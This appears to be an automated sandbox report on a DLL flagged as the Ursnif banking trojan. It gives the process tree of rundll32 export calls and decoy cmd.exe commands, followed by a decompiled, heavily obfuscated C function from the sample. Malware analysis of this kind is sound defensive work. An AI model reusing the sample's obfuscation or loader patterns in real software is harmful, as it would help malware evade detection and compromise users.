MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 7024 Parent PID: 6996

General

Start time:	10:14:35
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\n8x3d68Gnd.dll',#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7052 Parent PID: 6996

General

Start time:	10:14:36
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,Connectdark
Imagebase:	0x1090000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7064 Parent PID: 7024

General

Start time:	10:14:36
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\n8x3d68Gnd.dll',#1
Imagebase:	0x1090000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000003.00000002.949353578.000000006D461000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 7084 Parent PID: 7052

General

Start time:	10:14:36
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 7112 Parent PID: 7064

General

Start time:	10:14:36
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7120 Parent PID: 7084

General

Start time:	10:14:37
Start date:	11/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4164 Parent PID: 7112

General

Start time:	10:14:37
Start date:	11/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5780 Parent PID: 7052

General

Start time:	10:14:37
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6344 Parent PID: 5780

General

Start time:	10:14:38
Start date:	11/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6388 Parent PID: 7064

General

Start time:	10:14:38
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4112 Parent PID: 6388

General

Start time:	10:14:38
Start date:	11/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 6044 Parent PID: 6996

General

Start time:	10:14:40
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,Mindlake
Imagebase:	0x1090000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000000D.00000002.945539240.000000006D461000.00000020.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exe PID: 3436 Parent PID: 6044

General

Start time:	10:14:41
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4800 Parent PID: 3436

General

Start time:	10:14:41
Start date:	11/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 5772 Parent PID: 6996

General

Start time:	10:14:44
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,Porthigh
Imagebase:	0x1090000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000010.00000002.944163100.000000006D461000.00000020.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exe PID: 5680 Parent PID: 5772

General

Start time:	10:14:45
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 1288 Parent PID: 6044

General

Start time:	10:14:45
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4820 Parent PID: 5680

General

Start time:	10:14:45
Start date:	11/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 2212 Parent PID: 1288

General

Start time:	10:14:46
Start date:	11/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 4728 Parent PID: 6996

General

Start time:	10:14:48
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,Problemscale
Imagebase:	0x1090000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000015.00000002.921268168.000000006D461000.00000020.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exe PID: 2204 Parent PID: 5772

General

Start time:	10:14:50
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6200 Parent PID: 4728

General

Start time:	10:14:51
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 6208 Parent PID: 6996

General

Start time:	10:14:52
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,WingGrass
Imagebase:	0x1090000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000018.00000002.945736297.000000006D461000.00000020.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: conhost.exe PID: 6728 Parent PID: 2204

General

Start time:	10:14:53
Start date:	11/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6560 Parent PID: 6200

General

Start time:	10:14:53
Start date:	11/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6472 Parent PID: 6208

General

Start time:	10:14:58
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6596 Parent PID: 6472

General

Start time:	10:14:58
Start date:	11/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6580 Parent PID: 6996

General

Start time:	10:14:58
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6872 Parent PID: 4728

General

Start time:	10:15:01
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6820 Parent PID: 6872

General

Start time:	10:15:03
Start date:	11/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77ba70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6876 Parent PID: 6996

General

Start time:	10:15:05
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6940 Parent PID: 6208

General

Start time:	10:15:05
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6768 Parent PID: 6940

General

Start time:	10:15:12
Start date:	11/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6996 Parent PID: 6064 loaddll32.exeCOMMON

Executed Functions

Function 6D481285, Relevance: 44.3, APIs: 3, Strings: 22, Instructions: 597
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D481285(void* __ebx, void* __edi, void* __esi) {
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				void* _t135;
				int _t139;
				signed int _t142;
				signed int _t146;
				void* _t149;
				signed int _t151;
				signed int _t153;
				void* _t155;
				signed int _t156;
				void* _t164;
				signed int _t168;
				void* _t169;
				signed int _t171;
				void* _t174;
				signed int _t176;
				signed int _t178;
				signed int _t180;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				signed int _t190;
				signed int _t191;
				signed short* _t193;
				signed int _t195;
				void* _t197;
				signed int _t201;
				signed int _t202;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t216;
				signed int _t222;
				void* _t229;
				signed int _t242;
				signed int _t245;
				signed int _t256;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t268;
				void* _t270;
				signed int _t272;
				signed int _t277;
				void* _t281;
				signed int _t282;
				signed int _t286;
				signed int* _t287;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				void* _t301;
				intOrPtr* _t303;
				signed int _t305;
				signed int _t306;
				signed int _t315;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t324;
				signed int _t327;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				signed int _t336;
				signed int _t340;
				signed int _t342;
				signed short _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t354;
				signed int _t358;
				signed short* _t360;
				signed int _t362;
				signed int _t364;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t386;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				void* _t400;
				void* _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t405;
				void* _t411;
				intOrPtr _t412;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t422;
				intOrPtr _t423;
				intOrPtr _t426;
				void* _t427;
				void* _t428;
				void* _t434;
				intOrPtr _t435;
				void* _t446;
				void* _t450;
				signed int _t451;
				void* _t452;
				void* _t453;
				void* _t456;

				_t260 = __ebx;
				E6D4A00AC(0x6d4e7e6f, __ebx, __edi, __esi, 0x2c);
				_t324 =  *0x6d545a90; // 0x30c16f5c
				_t127 =  *0x6d5459d0; // 0xd7a19fd1
				_t261 =  *0x6d5459d8; // 0x92216ed4
				_t380 =  *0x6d5459dc; // 0x3
				_t358 =  *0x6d545a00; // 0xa8f42e50
				_t405 = 0 - _t380;
				_t327 =  *0x6d545a90; // 0x30c16f5c
				 *(_t400 - 0x18) = _t127 + _t324 + 0x31f;
				_t129 = _t261;
				 *(_t400 - 0x2c) = _t129;
				 *(_t400 - 0x1c) = _t380;
				if(_t405 >= 0 && (_t405 > 0 || _t358 >= _t129)) {
					_push(0);
					_t358 = _t358 - _t129 * 0x3d + 0xfffffd1c;
					 *0x6d545a58 =  *0x6d545a58 + 0xfffffd1c;
					 *0x6d545a00 = _t358;
					asm("adc dword [0x6d545a5c], 0xffffffff");
					_t380 = 0;
					asm("sbb esi, [ebp-0x1c]");
					_t261 = _t358 -  *(_t400 - 0x2c) + 0x2e4;
					 *0x6d5459d8 = _t261;
					asm("adc esi, eax");
					 *0x6d5459dc = 0;
				}
				 *(_t400 - 0x28) =  *0x6d5459e6 & 0x0000ffff;
				_t131 = 0x6d5459e6;
				 *(_t400 - 0x2c) = 0x6d5459e6;
				 *(_t400 - 0x1c) = 0x6d5459e6;
				do {
					if(_t358 ==  *(_t400 - 0x28)) {
						goto L8;
					} else {
						asm("cdq");
						_t133 = E6D4A01E0( *_t131 & 0x0000ffff, _t327, _t261, _t380);
						_t380 = _t327;
						_t261 = _t133;
						_t327 = _t358 + 5 + _t261;
						 *0x6d5459d8 = _t261;
						 *0x6d5459dc = _t380;
						 *0x6d545a90 = _t327;
						if(_t327 != ( *0x6d5459f0 & 0x0000ffff)) {
							_t131 =  *(_t400 - 0x1c);
							goto L8;
						}
					}
					break;
					L8:
					_t131 = _t131 + 2;
					 *(_t400 - 0x1c) = _t131;
				} while (_t131 < 0x6d545a44);
				_t135 = 6;
				_t411 =  *0x6d545a98 - _t135; // 0x6d4ee664
				if(_t411 != 0) {
					L12:
					_t262 = _t261 - 0x27 +  *(_t400 - 0x18) * 0x3d;
					__eflags = _t262;
					 *0x6d5459d8 = _t262;
					_t263 =  *(_t400 - 0x18);
					asm("sbb esi, edi");
					 *0x6d5459dc = _t380;
				} else {
					_t412 =  *0x6d545a9c; // 0x0
					if(_t412 != 0) {
						goto L12;
					} else {
						_t263 = _t261 + 0x11e05;
					}
				}
				 *0x6d5459d0 = _t263 - _t327 * 0x3d - 0x2e4;
				_t139 = GetSystemDirectoryA("C:\Windows\system32", 0x56d);
				_t381 =  *0x6d545a00; // 0xa8f42e50
				_t266 = _t139;
				_t329 = 0;
				_t360 = 0x6d5459e6;
				 *0x6d545a90 = _t139 -  *0x6d545a90 +  *0x6d5459d0;
				_t142 =  *0x6d5459e6 & 0x0000ffff;
				 *0x6d5459d8 = _t139;
				 *(_t400 - 0x1c) = 0;
				 *0x6d5459dc = 0;
				do {
					if(_t381 == _t142) {
						goto L17;
					} else {
						asm("cdq");
						_t266 = E6D4A01E0( *_t360 & 0x0000ffff, _t329, _t266,  *(_t400 - 0x1c));
						_t256 = _t329;
						 *0x6d5459d8 = _t266;
						 *(_t400 - 0x1c) = _t256;
						_t381 = _t381 + 5 + _t266;
						 *0x6d5459dc = _t256;
						 *0x6d545a90 = _t381;
						if(_t381 != ( *0x6d5459f0 & 0x0000ffff)) {
							_t381 =  *0x6d545a00; // 0xa8f42e50
							_t142 =  *0x6d5459e6 & 0x0000ffff;
							goto L17;
						}
					}
					break;
					L17:
					_t360 =  &(_t360[1]);
				} while (_t360 < 0x6d545a44);
				 *0x6d5459d0 = E6D480D32();
				GetTempPathA(0x56d, "C:\Users\jones\AppData\Local\Temp\");
				_t417 =  *0x6d545a04 - 0x1b47; // 0x0
				if(_t417 == 0) {
					_t318 =  *0x6d545a90; // 0x30c16f5c
					_t319 = _t318 + ( *0x6d5459e6 & 0x0000ffff);
					 *0x6d545a90 = _t319;
					_push(0);
					_t320 =  *0x6d5459d8; // 0x92216ed4
					asm("adc [0x6d5459dc], eax");
					 *0x6d5459d8 = _t320 + 0x3b + _t319 * 2;
				}
				_t146 = E6D480D32();
				_t402 = _t401 - 0x10;
				 *0x6d5459d0 = _t146;
				_t268 = _t402;
				 *(_t400 - 0x34) = _t402;
				_t330 = "6265";
				 *_t268 = 0;
				 *((intOrPtr*)(_t268 + 8)) = 0;
				 *((intOrPtr*)(_t268 + 0xc)) = 0;
				E6D485DAB(_t268, "6265");
				_push("Had s");
				 *(_t400 - 4) = 0;
				_t149 = E6D484197(_t260, "6265", 0, _t381);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6D481E10(_t149);
				_t270 = 6;
				_t418 =  *0x6d545a02 - _t270; // 0xa8f4
				if(_t418 == 0) {
					_t151 =  *0x6d5459d8; // 0x92216ed4
					_t153 = _t151 + 0x11dde +  *0x6d5459d0;
					__eflags = _t153;
					 *0x6d545a90 = _t153;
				} else {
					_t315 =  *0x6d5459d8; // 0x92216ed4
					 *0x6d5459d0 =  *0x6d5459d0 +  ~_t315 -  *0x6d545a90 * 0x3d;
				}
				_push("cd Island"); // executed
				E6D4C179F(_t260, _t330, 0, _t381);
				_t382 =  *0x6d5459d0; // 0xd7a19fd1
				_t155 = 6;
				_t25 = _t382 - 0x338; // 0xd7a19c99
				_t272 = _t25;
				 *0x6d545a90 = _t272;
				_t419 =  *0x6d545a02 - _t155; // 0xa8f4
				if(_t419 == 0) {
					_t331 =  *0x6d545a00; // 0xa8f42e50
					_t156 = 0;
					 *0x6d5459dc = 0;
					_t333 = _t331 + 0x11dde + _t272;
					__eflags = _t333;
					 *0x6d5459d8 = _t333;
				} else {
					_t333 =  *0x6d5459d8; // 0x92216ed4
					_t156 =  *0x6d5459dc; // 0x3
					 *0x6d545a90 = _t272 - _t333 * 0x3d -  *0x6d545a00;
				}
				_push(_t156);
				_push(_t333);
				_push(_t382);
				E6D484401(_t260, E6D484401(_t260, E6D481FF2(_t260, E6D4820D9(_t260, E6D484267(_t260, 0, _t382, _t419), _t333, 0, _t382), _t333, 0, _t382), 0x6d548150, 0, _t382, _t419), "part ", 0, _t382, _t419);
				_t336 =  *0x6d545a00; // 0xa8f42e50
				_t277 = 0x6d545a0e;
				_t362 =  *0x6d5459dc; // 0x3
				_t383 =  *0x6d5459d8; // 0x92216ed4
				do {
					if(_t336 != ( *0x6d5459e2 & 0x0000ffff)) {
						 *_t277 =  *_t277 + _t336;
						_t26 = _t336 + 5; // 0xa8f42e55
						_t245 = _t26 + _t383;
						 *0x6d545a90 = _t245;
						_t383 = _t383 + _t245 + 0x3b + _t336;
						_push(0);
						asm("adc edi, eax");
					}
					_t277 = _t277 - 4;
				} while (_t277 > 0x6d5459e2);
				_push("cd Matter m");
				 *0x6d5459d8 = _t383;
				 *0x6d5459dc = _t362; // executed
				E6D4C179F(_t260, _t336, _t362, _t383); // executed
				_t164 = 6;
				_t422 =  *0x6d545a98 - _t164; // 0x6d4ee664
				if(_t422 != 0) {
					L34:
					 *0x6d5459d8 =  *0x6d5459d8 - 0x27 +  *0x6d5459d0 * 0x3d;
					asm("sbb [0x6d5459dc], ecx");
				} else {
					_t423 =  *0x6d545a9c; // 0x0
					if(_t423 != 0) {
						goto L34;
					} else {
						_t242 =  *0x6d5459d8; // 0x92216ed4
						 *0x6d5459d0 = _t242 + 0x11e05;
					}
				}
				_t403 = _t402 - 0x10;
				 *(_t400 - 0x34) = _t403;
				 *0x6d545a90 =  *0x6d545a90 * 0x29266b;
				_t168 = _t403;
				 *_t168 = 5;
				 *((intOrPtr*)(_t168 + 8)) = 0x5c7;
				 *((intOrPtr*)(_t168 + 0xc)) = 0;
				_push("Molecul");
				 *(_t400 - 4) = 1;
				_t169 = E6D484197(_t260, _t336, _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6D481E10(_t169);
				_t281 = 0x27;
				_t171 = E6D480EF6(_t281);
				_t404 = _t403 - 0x10;
				 *0x6d5459d8 = _t171;
				_t282 = _t404;
				 *(_t400 - 0x34) = _t404;
				 *0x6d5459dc = 0;
				 *_t282 = 0;
				 *((intOrPtr*)(_t282 + 8)) = 0;
				 *((intOrPtr*)(_t282 + 0xc)) = 0;
				E6D485DAB(_t282, "6623");
				_push("out drop ");
				 *(_t400 - 4) = 2;
				_t174 = E6D484197(_t260, "6623", _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6D481E10(_t174);
				_t176 =  *0x6d5459dc; // 0x3
				 *(_t400 - 0x18) =  *0x6d5459d8 * 0x36 +  *0x6d545a90;
				_t286 =  *0x6d545a90 * 0x10e1d;
				_t178 =  *0x6d5459d8; // 0x92216ed4
				_t287 = 0x6d545a28;
				 *0x6d5459d8 = _t178 * _t286;
				_t340 =  *0x6d545a90; // 0x30c16f5c
				_t180 =  *0x6d5459d0; // 0xd7a19fd1
				 *0x6d5459dc = _t176 * _t286 + (_t178 * _t286 >> 0x20);
				_t386 =  *(_t400 - 0x18);
				_t342 = _t340 + _t386 + _t180 + 0x3b;
				do {
					if( *0x6d545a28 != 0x27) {
						L38:
						_t183 =  *_t287 * _t342;
						 *0x6d5459dc = 0;
						_t342 = _t183;
						_t184 = _t183 + 0x2c;
						 *0x6d5459d8 = _t184;
						_t427 = _t184 -  *0x6d545a50; // 0x4e
						if(_t427 != 0) {
							goto L40;
						} else {
							_t428 = 0 -  *0x6d545a54; // 0x0
							if(_t428 != 0) {
								goto L40;
							}
						}
					} else {
						_t426 =  *0x6d545a2c; // 0x0
						if(_t426 == 0) {
							goto L40;
						} else {
							goto L38;
						}
					}
					break;
					L40:
					_t287 =  &(_t287[2]);
				} while (_t287 < "or@std@@");
				_t185 = E6D480D32();
				_t364 =  *0x6d545a90; // 0x30c16f5c
				_t49 = _t386 + 0x11dde; // 0x11dde
				 *(_t400 - 0x1c) = _t185;
				 *(_t400 - 0x28) = _t49 + _t364;
				_t291 = _t185 * 0x10e1d;
				_t186 =  *0x6d5459dc; // 0x3
				_t188 =  *0x6d5459d8; // 0x92216ed4
				_t190 =  *0x6d5459f2 & 0x0000ffff;
